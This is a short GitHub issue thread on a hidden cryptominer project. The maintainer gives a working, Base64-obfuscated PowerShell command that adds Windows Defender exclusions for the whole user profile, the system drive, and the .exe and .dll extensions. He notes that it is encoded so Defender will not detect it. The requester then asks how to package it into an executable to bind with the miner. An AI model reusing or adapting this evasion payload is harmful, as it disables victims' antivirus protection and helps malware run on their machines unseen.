### ISSUE TITLE
Powershell

### ISSUE THREAD

**Issue by Milk8** [UnamSanctam/SilentCryptoMiner#311]
not directly on topic to the miner but I wasn't sure how else to contact you, 6+ months ago you had given me a powershell script that excluded the file on wd, do you still have this on hand? I can't find it exactly on github

**Comment by UnamSanctam** [comment]
The code gets encoded here: https://github.com/UnamSanctam/SilentCryptoMiner/blob/e7d01c6c5ba7e9fd88e9cbcadd25c64c02773939/SilentCryptoMiner/Classes/Codedom.cs#L18 since the normal WD exclusions now gets detected by Windows Defender. Here's one that's already encoded:
```
cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit

```

**Comment by Milk8** [comment]
I've got it working via cmd fine, how would I make this into an executable to bind with the miner? Putting it on a notepad and putting an exe extension on it dosent work

**Comment by Milk8** [comment]
Thanks
